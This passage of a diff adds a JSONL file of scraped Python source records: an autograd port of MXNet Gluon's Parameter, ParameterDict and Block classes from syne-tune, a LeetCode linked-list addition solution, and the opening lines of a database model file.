diff --git "a/2224.jsonl" "b/2224.jsonl" new file mode 100644--- /dev/null +++ "b/2224.jsonl" @@ -0,0 +1,1452 @@ +{"seq_id":"12723131343","text":"import threading\nimport warnings\nimport re\nfrom collections import OrderedDict\nimport autograd.numpy as anp\nfrom autograd.builtins import isinstance\n\n__all__ = [\"Block\", \"Parameter\", \"ParameterDict\"]\n\n\ndef _indent(s_, numSpaces):\n \"\"\"Indent string\"\"\"\n s = s_.split(\"\\n\")\n if len(s) == 1:\n return s_\n first = s.pop(0)\n s = [first] + [(numSpaces * \" \") + line for line in s]\n s = \"\\n\".join(s)\n return s\n\n\ndef shape_is_known(shape):\n \"\"\"Check whether a shape is completely known with or without np semantics.\n Please see the doc of :func:`is_np_shape` for more details.\n \"\"\"\n if shape is None:\n return False\n unknown_dim_size = -1\n if len(shape) == 0:\n return unknown_dim_size == -1\n for dim_size in shape:\n if dim_size == unknown_dim_size:\n return False\n assert (\n dim_size > unknown_dim_size\n ), \"shape dimension size cannot be less than {}, while \" \"received {}\".format(\n unknown_dim_size, dim_size\n )\n return True\n\n\nclass Parameter:\n \"\"\"A Container holding parameters (weights) of Blocks.\n :py:class:`Parameter` holds a copy of the parameter on each :py:class:`Context` after\n it is initialized with ``Parameter.initialize(...)``. If :py:attr:`grad_req` is\n not ``'null'``, it will also hold a gradient array on each :py:class:`Context`::\n x = np.zeros((16, 100))\n w = Parameter('fc_weight', shape=(16, 100), init=np.random.uniform)\n w.initialize()\n b.initialize()\n z = x + w.data\n Parameters\n ----------\n name : str\n Name of this parameter.\n grad_req : {'write', 'add', 'null'}, default 'write'\n Specifies how to update gradient to grad arrays.\n - ``'write'`` means everytime gradient is written to grad :py:class:`NDArray`.\n - ``'add'`` means everytime gradient is added to the grad :py:class:`NDArray`. You need\n to manually call ``zero_grad()`` to clear the gradient buffer before each\n iteration when using this option.\n - 'null' means gradient is not requested for this parameter. gradient arrays\n will not be allocated.\n shape : int or tuple of int, default None\n Shape of this parameter. By default shape is not specified. Parameter with\n unknown shape can be used for :py:class:`Symbol` API, but ``init`` will throw an error\n when using :py:class:`NDArray` API.\n dtype : numpy.dtype or str, default 'float64'\n Data type of this parameter. For example, ``numpy.float64`` or ``'float64'``.\n lr_mult : float, default 1.0\n Learning rate multiplier. Learning rate will be multiplied by lr_mult\n when updating this parameter with optimizer.\n wd_mult : float, default 1.0\n Weight decay multiplier (L2 regularizer coefficient). Works similar to lr_mult.\n init : Initializer, default None\n Initializer of this parameter. Will use the global initializer by default.\n stype: {'default', 'row_sparse', 'csr'}, defaults to 'default'.\n The storage type of the parameter.\n grad_stype: {'default', 'row_sparse', 'csr'}, defaults to 'default'.\n The storage type of the parameter's gradient.\n Attributes\n ----------\n grad_req : {'write', 'add', 'null'}\n This can be set before or after initialization. Setting ``grad_req`` to ``'null'``\n with ``x.grad_req = 'null'`` saves memory and computation when you don't\n need gradient w.r.t x.\n lr_mult : float\n Local learning rate multiplier for this Parameter. The actual learning rate\n is calculated with ``learning_rate * lr_mult``. 
You can set it with\n ``param.lr_mult = 2.0``\n wd_mult : float\n Local weight decay multiplier for this Parameter.\n \"\"\"\n\n def __init__(\n self,\n name,\n grad_req=\"write\",\n shape=None,\n dtype=anp.float64,\n lr_mult=1.0,\n wd_mult=1.0,\n init=None,\n allow_deferred_init=False,\n differentiable=True,\n stype=\"default\",\n grad_stype=\"default\",\n ):\n self._var = None\n self._data = None\n self._grad = None\n self._ctx_list = None\n self._ctx_map = None\n self._trainer = None\n self._deferred_init = ()\n self._differentiable = differentiable\n if allow_deferred_init:\n raise NotImplementedError(\n \"allow_deferred_init is not a valid option in autograd\"\n )\n self._allow_deferred_init = allow_deferred_init\n self._grad_req = None\n if isinstance(shape, int):\n shape = (shape,)\n self._shape = shape\n self.name = name\n self._dtype = dtype\n self.lr_mult = lr_mult\n self.wd_mult = wd_mult\n self.grad_req = grad_req\n self.init = init\n # sparse related storage type information\n valid_stypes = [\"default\"]\n assert grad_stype in valid_stypes, (\n \"grad_stype for Parameter '%s' must be \"\n \"one of 'default', 'row_sparse', or 'csr', but got '%s'\"\n % (name, grad_stype)\n )\n assert stype in valid_stypes, (\n \"stype for Parameter '%s' must be \"\n \"one of 'default', 'row_sparse', or 'csr', but got '%s'\" % (name, stype)\n )\n self._grad_stype = grad_stype\n self._stype = stype\n\n def __repr__(self):\n s = \"Parameter {name} (shape={shape}, dtype={dtype})\"\n return s.format(name=self.name, shape=self.shape, dtype=self.dtype)\n\n @property\n def grad_req(self):\n return self._grad_req\n\n @grad_req.setter\n def grad_req(self, req):\n assert req in [\"write\", \"add\", \"null\"], (\n \"grad_req must be one of 'write', 'add', or 'null', but got '%s'\" % req\n )\n if not self._differentiable:\n req = \"null\"\n if self._grad_req == req:\n return\n self._grad_req = req\n if req == \"null\" and self._grad is not None:\n self._grad = None\n self._data = [i.detach() for i in self._data]\n elif self._data is not None:\n self._init_grad()\n\n @property\n def dtype(self):\n \"\"\"The type of the parameter.\n Setting the dtype value is equivalent to casting the value of the parameter\n \"\"\"\n return self._dtype\n\n @dtype.setter\n def dtype(self, dtype):\n self.cast(dtype)\n\n @property\n def shape(self):\n \"\"\"The shape of the parameter.\n By default, an unknown dimension size is 0. However, when the NumPy semantic\n is turned on, unknown dimension size is -1.\n \"\"\"\n if self._shape is None:\n return None\n else:\n # Parameters shouldn't be zero-size. If one of its dimension is 0,\n # it means the parameter isn't initialized. 
In the NumPy semantics,\n # the unknown dimension should be marked with -1.\n return tuple(i if i != 0 else -1 for i in self._shape)\n\n @shape.setter\n def shape(self, new_shape):\n if self._shape is None:\n self._shape = new_shape\n return\n\n assert len(self._shape) == len(new_shape) and all(\n j in (-1, 0, i) for i, j in zip(new_shape, self._shape)\n ), \"Expected shape %s is incompatible with given shape %s.\" % (\n str(new_shape),\n str(self._shape),\n ) # -1 means unknown dim size in np_shape mode\n\n self._shape = new_shape\n\n def _check_and_get(self, arr_list, ctx):\n if arr_list is not None:\n if ctx is list:\n return arr_list\n if ctx is None:\n if len(arr_list) == 1:\n return arr_list[0]\n # else:\n # ctx = context.current_context()\n ctx_list = self._ctx_map[ctx.device_typeid & 1]\n if ctx.device_id < len(ctx_list):\n idx = ctx_list[ctx.device_id]\n if idx is not None:\n return arr_list[idx]\n raise RuntimeError(\n \"Parameter '%s' was not initialized on context %s. \"\n \"It was only initialized on %s.\"\n % (self.name, str(ctx), str(self._ctx_list))\n )\n if self._deferred_init:\n raise NotImplementedError(\"Cannot enable deferred init\")\n raise RuntimeError(\n \"Parameter '%s' has not been initialized. Note that \"\n \"you should initialize parameters and create Trainer \"\n \"with Block.collect_params() instead of Block.params \"\n \"because the later does not include Parameters of \"\n \"nested child Blocks\" % (self.name)\n )\n\n def _init_impl(self, data, ctx_list=None):\n \"\"\"Sets data and grad.\"\"\"\n self._data = [data]\n self._init_grad()\n\n def _init_grad(self):\n \"\"\"Initialize grad buffers.\"\"\"\n if self.grad_req == \"null\":\n self._grad = None\n return\n\n if self._grad_stype != \"default\":\n raise ValueError(\n \"numpy.zeros does not support stype = {}\".format(self._grad_stype)\n )\n self._grad = [anp.zeros(shape=i.shape, dtype=i.dtype) for i in self._data]\n\n # autograd.mark_variables(self._check_and_get(self._data, list),\n # self._grad, self.grad_req)\n\n def initialize(self, init=None, ctx=None, default_init=None, force_reinit=False):\n \"\"\"Initializes parameter and gradient arrays. Only used for :py:class:`NDArray` API.\n Parameters\n ----------\n init : Initializer\n The initializer to use. Overrides :py:meth:`Parameter.init` and default_init.\n ctx : Context or list of Context, defaults to :py:meth:`context.current_context()`.\n Initialize Parameter on given context. If ctx is a list of Context, a\n copy will be made for each context.\n .. note::\n Copies are independent arrays. User is responsible for keeping\n their values consistent when updating.\n Normally :py:class:`gluon.Trainer` does this for you.\n default_init : Initializer\n Default initializer is used when both :py:func:`init`\n and :py:meth:`Parameter.init` are ``None``.\n force_reinit : bool, default False\n Whether to force re-initialization if parameter is already initialized.\n Examples\n --------\n >>> weight = mx.gluon.Parameter('weight', shape=(2, 2))\n >>> weight.initialize(ctx=mx.cpu(0))\n >>> weight.data()\n [[-0.01068833 0.01729892]\n [ 0.02042518 -0.01618656]]\n \n >>> weight.grad()\n [[ 0. 0.]\n [ 0. 
0.]]\n \n >>> weight.initialize(ctx=[mx.gpu(0), mx.gpu(1)])\n >>> weight.data(mx.gpu(0))\n [[-0.00873779 -0.02834515]\n [ 0.05484822 -0.06206018]]\n \n >>> weight.data(mx.gpu(1))\n [[-0.00873779 -0.02834515]\n [ 0.05484822 -0.06206018]]\n \n \"\"\"\n if default_init is None:\n default_init = anp.random.uniform\n if self._data is not None and not force_reinit:\n warnings.warn(\n \"Parameter '%s' is already initialized, ignoring. \"\n \"Set force_reinit=True to re-initialize.\" % self.name,\n stacklevel=2,\n )\n return\n self._data = self._grad = None\n\n # init -> self.init -> default_init\n if init is None:\n init = default_init if self.init is None else self.init\n if not shape_is_known(self.shape):\n if self._allow_deferred_init:\n raise NotImplementedError(\"deferred_init not implemented for autograd\")\n return\n raise ValueError(\n \"Cannot initialize Parameter '%s' because it has \"\n \"invalid shape: %s.\" % (self.name, str(self.shape))\n )\n\n try:\n data = init(shape=self.shape)\n except TypeError:\n data = init(size=self.shape)\n self._init_impl(data, ctx_list=ctx)\n\n def reset_ctx(self, ctx):\n \"\"\"Re-assign Parameter to other contexts.\n Parameters\n ----------\n ctx : Context or list of Context, default ``context.current_context()``.\n Assign Parameter to given context. If ctx is a list of Context, a\n copy will be made for each context.\n \"\"\"\n return\n\n def set_data(self, data):\n \"\"\"Sets this parameter's value on all contexts.\"\"\"\n self.shape = data.shape\n\n if self._data is None:\n assert self._deferred_init, (\n \"Parameter '%s' has not been initialized\" % self.name\n )\n self._deferred_init = self._deferred_init[:3] + (data,)\n return\n\n # self._check_and_get(self._data, list)\n # added, raise no initialization error\n # for arr in self._check_and_get(self._data, list):\n # arr[:] = data\n for i in range(len(self._data)):\n self._data[i] = anp.array(data, copy=True)\n\n def data(self, ctx=None):\n \"\"\"Returns a copy of this parameter on one context. Must have been\n initialized on this context before. For sparse parameters, use\n :py:meth:`Parameter.row_sparse_data` instead.\n Parameters\n ----------\n ctx : Context\n Desired context.\n Returns\n -------\n NDArray on ctx\n \"\"\"\n if self._stype != \"default\":\n raise RuntimeError(\n \"Cannot return a copy of Parameter '%s' on ctx %s via data() \"\n \"because its storage type is %s. Please use row_sparse_data() \"\n \"instead.\" % (self.name, str(ctx), self._stype)\n )\n return self._check_and_get(self._data, ctx)\n\n def list_data(self):\n \"\"\"Returns copies of this parameter on all contexts, in the same order\n as creation. For sparse parameters, use :py:meth:`Parameter.list_row_sparse_data`\n instead.\n Returns\n -------\n list of NDArrays\n \"\"\"\n if self._stype != \"default\":\n raise RuntimeError(\n \"Cannot return copies of Parameter '%s' on all contexts via \"\n \"list_data() because its storage type is %s. 
Please use \"\n \"row_sparse_data() instead.\" % (self.name, self._stype)\n )\n return self._check_and_get(self._data, list)\n\n def grad(self, ctx=None):\n \"\"\"Returns a gradient buffer for this parameter on one context.\n Parameters\n ----------\n ctx : Context\n Desired context.\n \"\"\"\n if self._data is not None and self._grad is None:\n raise RuntimeError(\n \"Cannot get gradient array for Parameter '%s' \"\n \"because grad_req='null'\" % (self.name)\n )\n return self._check_and_get(self._grad, ctx)\n\n def list_grad(self):\n \"\"\"Returns gradient buffers on all contexts, in the same order\n as :py:meth:`values`.\"\"\"\n if self._data is not None and self._grad is None:\n raise RuntimeError(\n \"Cannot get gradient array for Parameter '%s' \"\n \"because grad_req='null'\" % (self.name)\n )\n return self._check_and_get(self._grad, list)\n\n def list_ctx(self):\n \"\"\"Returns a list of contexts this parameter is initialized on.\"\"\"\n if self._data is None:\n if self._deferred_init:\n return self._deferred_init[1]\n raise RuntimeError(\"Parameter '%s' has not been initialized\" % self.name)\n return self._ctx_list\n\n def zero_grad(self):\n \"\"\"Sets gradient buffer on all contexts to 0. No action is taken if\n parameter is uninitialized or doesn't require gradient.\"\"\"\n if self._grad is None:\n return\n for i in self._grad:\n i[:] = 0\n\n def cast(self, dtype):\n \"\"\"Cast data and gradient of this Parameter to a new data type.\n Parameters\n ----------\n dtype : str or numpy.dtype\n The new data type.\n \"\"\"\n self._dtype = dtype\n if self._data is None:\n return\n\n self._data = [i.astype(dtype) for i in self._data]\n if self._grad is None:\n return\n self._grad = [i.astype(dtype) for i in self._grad]\n\n\nclass ParameterDict:\n \"\"\"A dictionary managing a set of parameters.\n Parameters\n ----------\n prefix : str, default ``''``\n The prefix to be prepended to all Parameters' names created by this dict.\n shared : ParameterDict or None\n If not ``None``, when this dict's :py:meth:`get` method creates a new parameter, will\n first try to retrieve it from \"shared\" dict. Usually used for sharing\n parameters with another Block.\n \"\"\"\n\n def __init__(self, prefix=\"\", shared=None):\n self._prefix = prefix\n self._params = OrderedDict()\n self._shared = shared\n\n def __repr__(self):\n s = \"{name}(\\n{content}\\n)\"\n name = self._prefix + \" \" if self._prefix else \"\"\n return s.format(\n name=name,\n content=\"\\n\".join([_indent(\" {0}\".format(v), 2) for v in self.values()]),\n )\n\n def __getitem__(self, key):\n return self._params[key]\n\n def __iter__(self):\n return iter(self._params)\n\n def items(self):\n return self._params.items()\n\n def keys(self):\n return self._params.keys()\n\n def values(self):\n return self._params.values()\n\n @property\n def prefix(self):\n \"\"\"Prefix of this dict. It will be prepended to :py:class:`Parameter`s' name created\n with :py:func:`get`.\"\"\"\n return self._prefix\n\n def _get_impl(self, name):\n if name in self._params:\n return self._params[name]\n if self._shared is not None and name in self._shared._params:\n self._params[name] = self._shared._params[name]\n return self._shared._params[name]\n return None\n\n def get(self, name, **kwargs):\n \"\"\"Retrieves a :py:class:`Parameter` with name ``self.prefix+name``. If not found,\n :py:func:`get` will first try to retrieve it from \"shared\" dict. 
If still not\n found, :py:func:`get` will create a new :py:class:`Parameter` with key-word arguments and\n insert it to self.\n Parameters\n ----------\n name : str\n Name of the desired Parameter. It will be prepended with this dictionary's\n prefix.\n **kwargs : Dict[str, Any]\n The rest of key-word arguments for the created :py:class:`Parameter`.\n Returns\n -------\n Parameter\n The created or retrieved :py:class:`Parameter`.\n \"\"\"\n name = self.prefix + name\n param = self._get_impl(name)\n if param is None: # pylint: disable=too-many-nested-blocks\n param = Parameter(name, **kwargs)\n self._params[name] = param\n else:\n for k, v in kwargs.items():\n if hasattr(param, k) and getattr(param, k) is not None:\n existing = getattr(param, k)\n if k == \"shape\" and len(v) == len(existing):\n inferred_shape = []\n matched = True\n for dim1, dim2 in zip(v, existing):\n if dim1 != dim2 and dim1 > 0 and dim2 > 0:\n matched = False\n break\n elif dim1 == dim2:\n inferred_shape.append(dim1)\n elif dim1 in (\n 0,\n -1,\n ): # -1 means unknown dim size in np_shape mode\n inferred_shape.append(dim2)\n else:\n inferred_shape.append(dim1)\n\n if matched:\n param._shape = tuple(inferred_shape)\n continue\n elif k == \"dtype\" and anp.dtype(v) == anp.dtype(existing):\n continue\n\n assert v is None or v == existing, (\n \"Cannot retrieve Parameter '%s' because desired attribute \"\n \"does not match with stored for attribute '%s': \"\n \"desired '%s' vs stored '%s'.\"\n % (name, k, str(v), str(getattr(param, k)))\n )\n else:\n setattr(param, k, v)\n return param\n\n def update(self, other):\n \"\"\"Copies all Parameters in ``other`` to self.\"\"\"\n for k, v in other.items():\n if k in self._params:\n assert self._params[k] is v, (\n \"Cannot update self with other because they have different \"\n \"Parameters with the same name '%s'\" % k\n )\n\n for k, v in other.items():\n self._params[k] = v\n\n def initialize(self, init=None, ctx=None, verbose=False, force_reinit=False):\n \"\"\"Initializes all Parameters managed by this dictionary to be used for :py:class:`NDArray`\n API. It has no effect when using :py:class:`Symbol` API.\n Parameters\n ----------\n init : Initializer\n Global default Initializer to be used when :py:meth:`Parameter.init` is ``None``.\n Otherwise, :py:meth:`Parameter.init` takes precedence.\n ctx : Context or list of Context\n Keeps a copy of Parameters on one or many context(s).\n verbose : bool, default False\n Whether to verbosely print out details on initialization.\n force_reinit : bool, default False\n Whether to force re-initialization if parameter is already initialized.\n \"\"\"\n if init is None:\n init = anp.random.uniform\n if verbose:\n init.set_verbosity(verbose=verbose)\n for _, v in self.items():\n v.initialize(\n init=None, ctx=ctx, default_init=init, force_reinit=force_reinit\n )\n\n def reset_ctx(self, ctx):\n \"\"\"Re-assign all Parameters to other contexts.\n Parameters\n ----------\n ctx : Context or list of Context, default :py:meth:`context.current_context()`.\n Assign Parameter to given context. 
If ctx is a list of Context, a\n copy will be made for each context.\n \"\"\"\n for i in self.values():\n i.reset_ctx(ctx)\n\n def list_ctx(self):\n \"\"\"Returns a list of all the contexts on which the underlying Parameters\n are initialized.\"\"\"\n s = set()\n for i in self.values():\n s.update(i.list_ctx())\n return list(s)\n\n def setattr(self, name, value):\n \"\"\"Set an attribute to a new value for all Parameters.\n For example, set grad_req to null if you don't need gradient w.r.t a\n model's Parameters::\n model.collect_params().setattr('grad_req', 'null')\n or change the learning rate multiplier::\n model.collect_params().setattr('lr_mult', 0.5)\n Parameters\n ----------\n name : str\n Name of the attribute.\n value : valid type for attribute name\n The new value for the attribute.\n \"\"\"\n for i in self.values():\n setattr(i, name, value)\n\n\nclass NameManager:\n \"\"\"NameManager to do automatic naming.\n Developers can also inherit from this class to change naming behavior.\n \"\"\"\n\n _current = threading.local()\n\n def __init__(self):\n self._counter = {}\n self._old_manager = None\n\n def get(self, name, hint):\n \"\"\"Get the canonical name for a symbol.\n This is the default implementation.\n If the user specifies a name,\n the user-specified name will be used.\n When user does not specify a name, we automatically generate a\n name based on the hint string.\n Parameters\n ----------\n name : str or None\n The name specified by the user.\n hint : str\n A hint string, which can be used to generate name.\n Returns\n -------\n full_name : str\n A canonical name for the symbol.\n \"\"\"\n if name:\n return name\n if hint not in self._counter:\n self._counter[hint] = 0\n name = \"%s%d\" % (hint, self._counter[hint])\n self._counter[hint] += 1\n return name\n\n def __enter__(self):\n if not hasattr(NameManager._current, \"value\"):\n NameManager._current.value = NameManager()\n self._old_manager = NameManager._current.value\n NameManager._current.value = self\n return self\n\n def __exit__(self, ptype, value, trace):\n assert self._old_manager\n NameManager._current.value = self._old_manager\n\n\nclass Prefix(NameManager):\n \"\"\"A name manager that attaches a prefix to all names.\n Examples\n --------\n >>> import mxnet as mx\n >>> data = mx.symbol.Variable('data')\n >>> with mx.name.Prefix('mynet_'):\n net = mx.symbol.FullyConnected(data, num_hidden=10, name='fc1')\n >>> net.list_arguments()\n ['data', 'mynet_fc1_weight', 'mynet_fc1_bias']\n \"\"\"\n\n def __init__(self, prefix):\n super(Prefix, self).__init__()\n self._prefix = prefix\n\n def get(self, name, hint):\n name = super(Prefix, self).get(name, hint)\n return self._prefix + name\n\n\n# initialize the default name manager\nNameManager._current.value = NameManager()\n\n\nclass _BlockScope:\n \"\"\"Scope for collecting child `Block` s.\"\"\"\n\n _current = threading.local()\n\n def __init__(self, block):\n self._block = block\n self._counter = {}\n self._old_scope = None\n self._name_scope = None\n\n @staticmethod\n def create(prefix, params, hint):\n \"\"\"Creates prefix and params for new `Block`.\"\"\"\n current = getattr(_BlockScope._current, \"value\", None)\n if current is None:\n if prefix is None:\n if not hasattr(NameManager._current, \"value\"):\n NameManager._current.value = NameManager()\n prefix = NameManager._current.value.get(None, hint) + \"_\"\n if params is None:\n params = ParameterDict(prefix)\n else:\n params = ParameterDict(params.prefix, params)\n return prefix, params\n\n if prefix is 
None:\n count = current._counter.get(hint, 0)\n prefix = \"%s%d_\" % (hint, count)\n current._counter[hint] = count + 1\n if params is None:\n parent = current._block.params\n params = ParameterDict(parent.prefix + prefix, parent._shared)\n else:\n params = ParameterDict(params.prefix, params)\n return current._block.prefix + prefix, params\n\n def __enter__(self):\n if self._block._empty_prefix:\n return self\n self._old_scope = getattr(_BlockScope._current, \"value\", None)\n _BlockScope._current.value = self\n self._name_scope = Prefix(self._block.prefix)\n self._name_scope.__enter__()\n return self\n\n def __exit__(self, ptype, value, trace):\n if self._block._empty_prefix:\n return\n self._name_scope.__exit__(ptype, value, trace)\n self._name_scope = None\n _BlockScope._current.value = self._old_scope\n\n\nclass Block:\n \"\"\"Base class for all neural network layers and models. Your models should\n subclass this class.\n :py:class:`Block` can be nested recursively in a tree structure. You can create and\n assign child :py:class:`Block` as regular attributes::\n from mxnet.gluon import Block, nn\n from mxnet import ndarray as F\n class Model(Block):\n def __init__(self, **kwargs):\n super(Model, self).__init__(**kwargs)\n # use name_scope to give child Blocks appropriate names.\n with self.name_scope():\n self.dense0 = nn.Dense(20)\n self.dense1 = nn.Dense(20)\n def forward(self, x):\n x = F.relu(self.dense0(x))\n return F.relu(self.dense1(x))\n model = Model()\n model.initialize(ctx=mx.cpu(0))\n model(F.zeros((10, 10), ctx=mx.cpu(0)))\n Child :py:class:`Block` assigned this way will be registered and :py:meth:`collect_params`\n will collect their Parameters recursively. You can also manually register\n child blocks with :py:meth:`register_child`.\n Parameters\n ----------\n prefix : str\n Prefix acts like a name space. All children blocks created in parent block's\n :py:meth:`name_scope` will have parent block's prefix in their name.\n Please refer to\n `naming tutorial `__\n for more info on prefix and naming.\n params : ParameterDict or None\n :py:class:`ParameterDict` for sharing weights with the new :py:class:`Block`. 
For example,\n if you want ``dense1`` to share ``dense0``'s weights, you can do::\n dense0 = nn.Dense(20)\n dense1 = nn.Dense(20, params=dense0.collect_params())\n \"\"\"\n\n def __init__(self, prefix=None, params=None):\n self._empty_prefix = prefix == \"\"\n self._prefix, self._params = _BlockScope.create(prefix, params, self._alias())\n self._name = self._prefix[:-1] if self._prefix.endswith(\"_\") else self._prefix\n self._scope = _BlockScope(self)\n self._children = OrderedDict()\n self._reg_params = {}\n self._forward_hooks = OrderedDict()\n self._forward_pre_hooks = OrderedDict()\n\n def __repr__(self):\n s = \"{name}(\\n{modstr}\\n)\"\n modstr = \"\\n\".join(\n [\n \" ({key}): {block}\".format(key=key, block=_indent(block.__repr__(), 2))\n for key, block in self.__dict__.items()\n if isinstance(block, Block)\n ]\n )\n return s.format(name=self.__class__.__name__, modstr=modstr)\n\n def __setattr__(self, name, value):\n \"\"\"Registers parameters.\"\"\"\n\n if hasattr(self, name):\n existing = getattr(self, name)\n if isinstance(existing, (Parameter, Block)) and not isinstance(\n value, type(existing)\n ):\n raise TypeError(\n \"Changing attribute type for {name} from {type1} to {type2}\"\n \"is not allowed.\".format(\n name=name, type1=type(existing), type2=type(value)\n )\n )\n\n if isinstance(value, Block):\n self.register_child(value, name)\n elif isinstance(value, Parameter):\n assert name not in self._reg_params, (\n \"Overriding Parameter attribute %s is not allowed. \"\n \"If you want to share parameters between blocks, please set \"\n \"'params' at Block construction instead.\"\n )\n self._reg_params[name] = value\n\n super(Block, self).__setattr__(name, value)\n\n def _check_container_with_block(self):\n children = set(self._children.values())\n\n def _find_unregistered_block_in_container(data):\n # Find whether a nested container structure contains Blocks\n if isinstance(data, (list, tuple)):\n for ele in data:\n if _find_unregistered_block_in_container(ele):\n return True\n return False\n elif isinstance(data, dict):\n for _, v in data.items():\n if _find_unregistered_block_in_container(v):\n return True\n return False\n elif isinstance(data, Block):\n return not data in children\n else:\n return False\n\n for k, v in self.__dict__.items():\n if isinstance(v, (list, tuple, dict)) and not (\n k.startswith(\"__\") or k == \"_children\"\n ):\n if _find_unregistered_block_in_container(v):\n warnings.warn(\n '\"{name}\" is an unregistered container with Blocks. '\n \"Note that Blocks inside the list, tuple or dict will not be \"\n \"registered automatically. Make sure to register them using \"\n \"register_child() or switching to \"\n \"nn.Sequential/nn.HybridSequential instead. \".format(\n name=self.__class__.__name__ + \".\" + k\n ),\n stacklevel=3,\n )\n\n def _alias(self):\n return self.__class__.__name__.lower()\n\n @property\n def prefix(self):\n \"\"\"Prefix of this :py:class:`Block`.\"\"\"\n return self._prefix\n\n @property\n def name(self):\n \"\"\"Name of this :py:class:`Block`, without '_' in the end.\"\"\"\n return self._name\n\n def name_scope(self):\n \"\"\"Returns a name space object managing a child :py:class:`Block` and parameter\n names. 
Should be used within a ``with`` statement::\n with self.name_scope():\n self.dense = nn.Dense(20)\n Please refer to\n `the naming tutorial `__\n for more info on prefix and naming.\n \"\"\"\n return self._scope\n\n @property\n def params(self):\n \"\"\"Returns this :py:class:`Block`'s parameter dictionary (does not include its\n children's parameters).\"\"\"\n return self._params\n\n def collect_params(self, select=None):\n \"\"\"Returns a :py:class:`ParameterDict` containing this :py:class:`Block` and all of its\n children's Parameters(default), also can returns the select :py:class:`ParameterDict`\n which match some given regular expressions.\n For example, collect the specified parameters in ['conv1_weight', 'conv1_bias', 'fc_weight',\n 'fc_bias']::\n model.collect_params('conv1_weight|conv1_bias|fc_weight|fc_bias')\n or collect all parameters whose names end with 'weight' or 'bias', this can be done\n using regular expressions::\n model.collect_params('.*weight|.*bias')\n Parameters\n ----------\n select : str\n regular expressions\n Returns\n -------\n The selected :py:class:`ParameterDict`\n \"\"\"\n # We need to check here because blocks inside containers are not supported.\n self._check_container_with_block()\n ret = ParameterDict(self._params.prefix)\n if not select:\n ret.update(self.params)\n else:\n pattern = re.compile(select)\n ret.update(\n {\n name: value\n for name, value in self.params.items()\n if pattern.match(name)\n }\n )\n for cld in self._children.values():\n ret.update(cld.collect_params(select=select))\n return ret\n\n def _collect_params_with_prefix(self, prefix=\"\"):\n if prefix:\n prefix += \".\"\n ret = {prefix + key: val for key, val in self._reg_params.items()}\n for name, child in self._children.items():\n ret.update(child._collect_params_with_prefix(prefix + name))\n return ret\n\n def register_child(self, block, name=None):\n \"\"\"Registers block as a child of self. 
:py:class:`Block` s assigned to self as\n attributes will be registered automatically.\"\"\"\n if name is None:\n name = str(len(self._children))\n self._children[name] = block\n\n # def register_forward_pre_hook(self, hook):\n # r\"\"\"Registers a forward pre-hook on the block.\n # The hook function is called immediately before :func:`forward`.\n # It should not modify the input or output.\n # Parameters\n # ----------\n # hook : callable\n # The forward hook function of form `hook(block, input) -> None`.\n # Returns\n # -------\n # :class:`mxnet.gluon.utils.HookHandle`\n # \"\"\"\n # handle = HookHandle()\n # handle.attach(self._forward_pre_hooks, hook)\n # return handle\n\n # def register_forward_hook(self, hook):\n # r\"\"\"Registers a forward hook on the block.\n # The hook function is called immediately after :func:`forward`.\n # It should not modify the input or output.\n # Parameters\n # ----------\n # hook : callable\n # The forward hook function of form `hook(block, input, output) -> None`.\n # Returns\n # -------\n # :class:`mxnet.gluon.utils.HookHandle`\n # \"\"\"\n # handle = HookHandle()\n # handle.attach(self._forward_hooks, hook)\n # return handle\n\n def apply(self, fn):\n r\"\"\"Applies ``fn`` recursively to every child block as well as self.\n Parameters\n ----------\n fn : callable\n Function to be applied to each submodule, of form `fn(block)`.\n Returns\n -------\n this block\n \"\"\"\n for cld in self._children.values():\n cld.apply(fn)\n fn(self)\n return self\n\n def initialize(self, init=None, ctx=None, verbose=False, force_reinit=False):\n \"\"\"Initializes :py:class:`Parameter` s of this :py:class:`Block` and its children.\n Equivalent to ``block.collect_params().initialize(...)``\n Parameters\n ----------\n init : Initializer\n Global default Initializer to be used when :py:meth:`Parameter.init` is ``None``.\n Otherwise, :py:meth:`Parameter.init` takes precedence.\n ctx : Context or list of Context\n Keeps a copy of Parameters on one or many context(s).\n verbose : bool, default False\n Whether to verbosely print out details on initialization.\n force_reinit : bool, default False\n Whether to force re-initialization if parameter is already initialized.\n \"\"\"\n if init is None:\n init = anp.random.uniform\n self.collect_params().initialize(init, ctx, verbose, force_reinit)\n\n def hybridize(self, active=True, **kwargs):\n \"\"\"Please refer description of HybridBlock hybridize().\"\"\"\n for cld in self._children.values():\n cld.hybridize(active, **kwargs)\n\n def cast(self, dtype):\n \"\"\"Cast this Block to use another data type.\n Parameters\n ----------\n dtype : str or numpy.dtype\n The new data type.\n \"\"\"\n for child in self._children.values():\n child.cast(dtype)\n for _, param in self.params.items():\n param.cast(dtype)\n\n def __call__(self, *args):\n \"\"\"Calls forward. Only accepts positional arguments.\"\"\"\n # for hook in self._forward_pre_hooks.values():\n # hook(self, args)\n\n out = self.forward(*args)\n\n # for hook in self._forward_hooks.values():\n # hook(self, args, out)\n # if _mx_npx.is_np_array():\n # _check_all_np_ndarrays(out)\n return out\n\n def forward(self, *args):\n \"\"\"Overrides to implement forward computation using :py:class:`NDArray`. 
Only\n accepts positional arguments.\n Parameters\n ----------\n *args : list of NDArray\n Input tensors.\n \"\"\"\n raise NotImplementedError\n # pylint: disable= invalid-name\n\n def hybrid_forward(self, *args):\n return self(*args)\n","repo_name":"awslabs/syne-tune","sub_path":"syne_tune/optimizer/schedulers/searchers/bayesopt/gpautograd/gluon.py","file_name":"gluon.py","file_ext":"py","file_size_in_byte":40088,"program_lang":"python","lang":"en","doc_type":"code","stars":332,"dataset":"github-code","pt":"67"} +{"seq_id":"71878185175","text":"#!/usr/bin/python\n\n# Definiton for singly-linked list.\n\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution(object):\n def addTwoNumber(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n\n head = cur = ListNode(0)\n carry = 0\n while l1 or l2:\n val = carry\n if l1:\n val += l1.val\n l1 = l1.next\n if l2:\n val += l2.val\n l2 = l2.next\n\n cur.next = ListNode(val % 10)\n carry = val / 10\n cur = cur.next\n\n if carry == 1:\n cur.next = ListNode(1)\n\n return head.next\n","repo_name":"muryo/my-leetcode","sub_path":"002_Add_Two_Numbers.py","file_name":"002_Add_Two_Numbers.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73495037332","text":"from models.shared import db\nfrom datetime import datetime\nimport json\nimport base64\nimport requests\n\nclass Evaluation(db.Model):\n id = 